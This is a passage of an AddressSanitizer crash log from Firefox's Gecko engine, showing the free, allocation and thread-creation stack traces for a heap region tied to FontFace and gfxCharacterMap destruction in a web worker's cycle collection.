    #11 0x7f0f7233f976 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #12 0x7f0f7233f976 in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
    #13 0x7f0f7233f976 in mozilla::dom::FontFace::~FontFace() /builds/worker/checkouts/gecko/layout/style/FontFace.cpp:83:1
    #14 0x7f0f7235f200 in DeleteCycleCollectable /builds/worker/checkouts/gecko/layout/style/FontFace.cpp:73:1
    #15 0x7f0f7235f200 in mozilla::dom::FontFace::cycleCollection::DeleteCycleCollectable(voibuilds/worker/workspace/obj-build/dist/include/mozilla/dom/FontFace.h:44:3
    #16 0x7f0f69c1ded2 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2406:7
    #17 0x7f0f69c1d46e in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2596:3
    #18 0x7f0f69c25424 in nsCycleCollector::BeginCollection(mozilla::CCReason, ccIsManual, nsICycleCollectorListener*) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3585:3
    #19 0x7f0f69c24a4c in nsCycleCollector::Collect(mozilla::CCReason, ccIsManual, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3412:9
    #20 0x7f0f69c2813a in nsCycleCollector_collect(mozilla::CCReason, nsICycleCollectorListener*) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3920:28
    #21 0x7f0f7156ca3d in mozilla::dom::workerinternals::(anonymous namespace)::WorkerJSRuntime::CustomGCCallback(JSGCStatus) /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:816:11
    #22 0x7f0f69bd9338 in mozilla::CycleCollectedJSRuntime::OnGC(JSContext*, JSGCStatus, JS::GCReason) /builds/worker/checkouts/gecko/xpcom/base/CycleCollectedJSRuntime.cpp:1884:3
    #23 0x7f0f77c1f298 in js::gc::GCRuntime::maybeCallGCCallback(JSGCStatus, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:3755:3
    #24 0x7f0f77c1fc6c in ~AutoCallGCCallbacks /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:3728:32
    #25 0x7f0f77c1fc6c in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget const&amp;, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:3845:1
    #26 0x7f0f77c21b20 in js::gc::GCRuntime::collect(bool, js::SliceBudget const&amp;, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:4027:9
    #27 0x7f0f77beca36 in js::gc::GCRuntime::gc(JS::GCOptions, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:4104:3
    #28 0x7f0f7156ae49 in mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:2084:7
    #29 0x7f0f69e0193e in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16
    #30 0x7f0f69e0b594 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10
    #31 0x7f0f6b415c38 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #32 0x7f0f6b2b1361 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #33 0x7f0f6b2b1361 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #34 0x7f0f6b2b1361 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #35 0x7f0f69df8a94 in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:384:10
    #36 0x7f0f8b5d7c0e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #37 0x7f0f8bdb774c  (/usr/lib/libc.so.6+0x8674c) (BuildId: 26c81e7e05ebaf40bac3523b7d76be0cd71fad82)
    #38 0x7f0f8be396ff  (/usr/lib/libc.so.6+0x1086ff) (BuildId: 26c81e7e05ebaf40bac3523b7d76be0cd71fad82)
0x6030001a4f88 is located 24 bytes inside of 32-byte region [0x6030001a4f70,0x6030001a4f90)
freed by thread T231 here:
    #0 0x55ffcf465ef2 in __interceptor_free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:52:3
    #1 0x7f0f6c3ca782 in operator delete /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:51:10
    #2 0x7f0f6c3ca782 in gfxCharacterMap::NotifyMaybeReleased() /builds/worker/checkouts/gecko/gfx/thebes/gfxFontEntry.cpp:73:3
    #3 0x7f0f72342cd7 in Release /builds/worker/workspace/obj-build/dist/include/gfxFontEntry.h:84:14
    #4 0x7f0f72342cd7 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #5 0x7f0f72342cd7 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #6 0x7f0f72342cd7 in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
    #7 0x7f0f72342cd7 in mozilla::dom::FontFaceImpl::~FontFaceImpl() /builds/worker/checkouts/gecko/layout/style/FontFaceImpl.cpp:75:1
    #8 0x7f0f7233f976 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FontFaceImpl.h:37:3
    #9 0x7f0f7233f976 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:50:40
    #10 0x7f0f7233f976 in Release /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:381:36
    #11 0x7f0f7233f976 in ~RefPtr /builds/worker/workspace/obj-build/dist/include/mozilla/RefPtr.h:81:7
    #12 0x7f0f7233f976 in mozilla::dom::FontFace::~FontFace() /builds/worker/checkouts/gecko/layout/style/FontFace.cpp:83:1
    #13 0x7f0f7235f200 in DeleteCycleCollectable /builds/worker/checkouts/gecko/layout/style/FontFace.cpp:73:1
    #14 0x7f0f7235f200 in mozilla::dom::FontFace::cycleCollection::DeleteCycleCollectable(void*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FontFace.h:44:3
    #15 0x7f0f69c1ded2 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2406:7
    #16 0x7f0f69c1d46e in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2596:3
    #17 0x7f0f69c25424 in nsCycleCollector::BeginCollection(mozilla::CCReason, ccIsManual, nsICycleCollectorListener*) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3585:3
    #18 0x7f0f69c24a4c in nsCycleCollector::Collect(mozilla::CCReason, ccIsManual, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3412:9
    #19 0x7f0f69c2813a in nsCycleCollector_collect(mozilla::CCReason, nsICycleCollectorListener*) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3920:28
    #20 0x7f0f7156ca3d in mozilla::dom::workerinternals::(anonymous namespace)::WorkerJSRuntime::CustomGCCallback(JSGCStatus) /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:816:11
    #21 0x7f0f69bd9338 in mozilla::CycleCollectedJSRuntime::OnGC(JSContext*, JSGCStatus, JS::GCReason) /builds/worker/checkouts/gecko/xpcom/base/CycleCollectedJSRuntime.cpp:1884:3
    #22 0x7f0f77c1f298 in js::gc::GCRuntime::maybeCallGCCallback(JSGCStatus, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:3755:3
    #23 0x7f0f77c1fc6c in ~AutoCallGCCallbacks /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:3728:32
    #24 0x7f0f77c1fc6c in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget const&amp;, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:3845:1
    #25 0x7f0f77c21b20 in js::gc::GCRuntime::collect(bool, js::SliceBudget const&amp;, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:4027:9
    #26 0x7f0f77beca36 in js::gc::GCRuntime::gc(JS::GCOptions, JS::GCReason) /builds/worker/checkouts/gecko/js/src/gc/GC.cpp:4104:3
    #27 0x7f0f7156ae49 in mozilla::dom::workerinternals::(anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:2084:7
    #28 0x7f0f69e0193e in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199:16
    #29 0x7f0f69e0b594 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10
    #30 0x7f0f6b415c38 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #31 0x7f0f6b2b1361 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #32 0x7f0f6b2b1361 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #33 0x7f0f6b2b1361 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #34 0x7f0f69df8a94 in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:384:10
    #35 0x7f0f8b5d7c0e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #36 0x7f0f8bdb774c  (/usr/lib/libc.so.6+0x8674c) (BuildId: 26c81e7e05ebaf40bac3523b7d76be0cd71fad82)
previously allocated by thread T0 (Isolated Web Co) here:
    #0 0x55ffcf46619e in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3
    #1 0x55ffcf4aacb5 in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f0f7234699c in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f0f7234699c in mozilla::dom::FontFaceImpl::GetUnicodeRangeAsCharacterMap() /builds/worker/checkouts/gecko/layout/style/FontFaceImpl.cpp:688:39
    #4 0x7f0f72354650 in mozilla::dom::FontFaceSetImpl::FindOrCreateUserFontEntryFromFontFace(nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::FontFaceImpl*, mozilla::StyleOrigin) /builds/worker/checkouts/gecko/layout/style/FontFaceSetImpl.cpp:458:47
    #5 0x7f0f72343fd1 in mozilla::dom::FontFaceSetImpl::FindOrCreateUserFontEntryFromFontFace(mozilla::dom::FontFaceImpl*) /builds/worker/checkouts/gecko/layout/style/FontFaceSetImpl.cpp:345:10
    #6 0x7f0f723440e1 in mozilla::dom::FontFaceImpl::CreateUserFontEntry() /builds/worker/checkouts/gecko/layout/style/FontFaceImpl.cpp:326:9
    #7 0x7f0f72343905 in mozilla::dom::FontFaceImpl::DoLoad() /builds/worker/checkouts/gecko/layout/style/FontFaceImpl.cpp:342:8
    #8 0x7f0f7236493f in operator() /builds/worker/checkouts/gecko/layout/style/FontFaceImpl.cpp:338:65
    #9 0x7f0f7236493f in mozilla::detail::RunnableFunction&lt;mozilla::dom::FontFaceImpl::DoLoad()::$_9&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:531:5
    #10 0x7f0f69e1f6b2 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:538:16
    #11 0x7f0f69ddfdbd in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:851:26
    #12 0x7f0f69ddcf28 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:683:15
    #13 0x7f0f69ddd650 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:461:36
    #14 0x7f0f69e28714 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:190:37
    #15 0x7f0f69e28714 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_1&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:531:5
    #16 0x7f0f69e01117 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1205:16
    #17 0x7f0f69e0b594 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10
    #18 0x7f0f6b414bfd in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:107:5
    #19 0x7f0f6b2b1361 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #20 0x7f0f6b2b1361 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #21 0x7f0f6b2b1361 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #22 0x7f0f71ea4717 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:150:27
    #23 0x7f0f76d0f307 in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:880:20
    #24 0x7f0f6b2b1361 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #25 0x7f0f6b2b1361 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #26 0x7f0f6b2b1361 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #27 0x7f0f76d0e22c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:739:34
    #28 0x55ffcf4a3825 in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #29 0x55ffcf4a3c77 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:359:18
    #30 0x7f0f8bd5428f  (/usr/lib/libc.so.6+0x2328f) (BuildId: 26c81e7e05ebaf40bac3523b7d76be0cd71fad82)
Thread T228 created by T0 (Isolated Web Co) here:
    #0 0x55ffcf44f6fc in __interceptor_pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:208:3
    #1 0x7f0f8b5c7cbc in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7f0f8b5b905e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7f0f69dfba15 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:618:18
    #4 0x7f0f715baa3a in mozilla::dom::WorkerThread::Create(mozilla::dom::WorkerThreadFriendKey const&amp;) /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102:7
    #5 0x7f0f71545e65 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker(mozilla::dom::WorkerPrivate&amp;) /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1323:37
    #6 0x7f0f71544f8e in mozilla::dom::workerinternals::RuntimeService::RegisterWorker(mozilla::dom::WorkerPrivate&amp;) /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1205:19
    #7 0x7f0f7158e557 in mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerKind, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;, nsTString&lt;char16_t&gt;) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2588:24
    #8 0x7f0f71555525 in mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43:41
    #9 0x7f0f6e33f2f4 in mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1107:52
    #10 0x7f0f7882e937 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13
    #11 0x7f0f7882e937 in CallJSNativeConstructor /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:474:8
    #12 0x7f0f7882e937 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:693:10
    #13 0x7f0f7881a99e in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3359:16
    #14 0x7f0f787ffffe in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:430:13
    #15 0x7f0f7882c165 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:578:13
    #16 0x7f0f7882dc0e in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:613:10
    #17 0x7f0f7882dc0e in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:645:8
    #18 0x7f0f7717da05 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117:10
    #19 0x7f0f6e7e05a7 in mozilla::dom::Function::Call(mozilla::dom::BindingCallContext&amp;, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50:8
    #20 0x7f0f6cd8932c in void mozilla::dom::Function::Call&lt;nsCOMPtr&lt;nsIGlobalObject&gt; &gt;(nsCOMPtr&lt;nsIGlobalObject&gt; const&amp;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71:12
    #21 0x7f0f6cd88f32 in mozilla::dom::CallbackTimeoutHandler::Call(char const*) /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167:29
    #22 0x7f0f6c9ae90b in nsGlobalWindowInner::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:6471:38
    #23 0x7f0f6cd852ab in mozilla::dom::TimeoutManager::RunTimeout(mozilla::TimeStamp const&amp;, mozilla::TimeStamp const&amp;, bool) /builds/worker/checkouts/gecko/dom/base/TimeoutManager.cpp:903:44
    #24 0x7f0f6cd8443a in mozilla::dom::TimeoutExecutor::MaybeExecute() /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp:179:11
    #25 0x7f0f6cd86b1b in mozilla::dom::TimeoutExecutor::Run() /builds/worker/checkouts/gecko/dom/base/TimeoutExecutor.cpp:234:5
    #26 0x7f0f69e266b2 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /builds/worker/checkouts/gecko/xpcom/threads/ThrottledEventQueue.cpp:254:22
    #27 0x7f0f69e1922f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /builds/worker/checkouts/gecko/xpcom/threads/ThrottledEventQueue.cpp:81:15
    #28 0x7f0f69e1f6b2 in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:538:16
    #29 0x7f0f69ddfdbd in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:851:26
    #30 0x7f0f69ddcf28 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:683:15
    #31 0x7f0f69ddd650 in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:461:36
    #32 0x7f0f69e286e1 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:187:37
    #33 0x7f0f69e286e1 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_0&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:531:5
    #34 0x7f0f69e01117 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1205:16
    #35 0x7f0f69e0b594 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:465:10
    #36 0x7f0f6b414a88 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85:21
    #37 0x7f0f6b2b1361 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #38 0x7f0f6b2b1361 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #39 0x7f0f6b2b1361 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #40 0x7f0f71ea4717 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:150:27
    #41 0x7f0f76d0f307 in XRE_RunAppShell() /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:880:20
    #42 0x7f0f6b2b1361 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:381:10
    #43 0x7f0f6b2b1361 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374:3
    #44 0x7f0f6b2b1361 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356:3
    #45 0x7f0f76d0e22c in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:739:34
    #46 0x55ffcf4a3825 in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #47 0x55ffcf4a3c77 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:359:18
    #48 0x7f0f8bd5428f  (/usr/lib/libc.so.6+0x2328f) (BuildId: 26c81e7e05ebaf40bac3523b7d76be0cd71fad82)
Thread T231 created by T0 (Isolated Web Co) here:
    #0 0x55ffcf44f6fc in __interceptor_pthread_create /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:208:3
    #1 0x7f0f8b5c7cbc in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
    #2 0x7f0f8b5b905e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
    #3 0x7f0f69dfba15 in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:618:18
    #4 0x7f0f715baa3a in mozilla::dom::WorkerThread::Create(mozilla::dom::WorkerThreadFriendKey const&amp;) /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102:7
    #5 0x7f0f71545e65 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker(mozilla::dom::WorkerPrivate&amp;) /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1323:37
    #6 0x7f0f71544f8e in mozilla::dom::workerinternals::RuntimeService::RegisterWorker(mozilla::dom::WorkerPrivate&amp;) /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1205:19
    #7 0x7f0f7158e557 in mozilla::dom::WorkerPrivate::Constructor(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, bool, mozilla::dom::WorkerKind, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, mozilla::dom::WorkerLoadInfo*, mozilla::ErrorResult&amp;, nsTString&lt;char16_t&gt;) /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2588:24
    #8 0x7f0f71555525 in mozilla::dom::Worker::Constructor(mozilla::dom::GlobalObject const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43:41
    #9 0x7f0f6e33f2f4 in mozilla::dom::Worker_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1107:52
    #10 0x7f0f7882e937 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458:13
    #11 0x7f0f7882e937 in CallJSNativeConstructor /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:474:8
    #12 0x7f0f7882e937 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:693:10
    #13 0x7f0f7881a99e in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3359:16
    #14 0x7f0f787ffffe in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:430:13
    #15 0x7f0f7882c165 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:578:13
    #16 0x7f0f7882dc0e in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:613:10
    #17 0x7f0f7882dc0e in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:645:8
    #18 0x7f0f7717da05 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117:10
    #19 0x7f0f6e7e05a7 in mozilla::dom::Function::Call(mozilla::dom::BindingCallContext&amp;, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50:8
    #20 0x7f0f6cd8932c in void mozilla::dom::Function::Call&lt;nsCOMPtr&lt;nsIGlobalObject&gt; &gt;(nsCOMPtr&lt;nsIGlobalObject&gt; const&amp;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;, char const*, mozilla::dom::CallbackObject::ExceptionHandling, JS::Realm*) /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71:12
    #21 0x7f0f6cd88f32 in mozilla::dom::CallbackTimeoutHandler::Call(char const*) /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167:29
    #22 0x7f0f6c9ae90b in nsGlobalWindowInner::RunTimeoutHandler(mozilla::dom::Timeout*, nsIScriptContext*) /builds/worker/checkouts/gecko/dom/base/nsGlobalWindowInner.cpp:6471:38
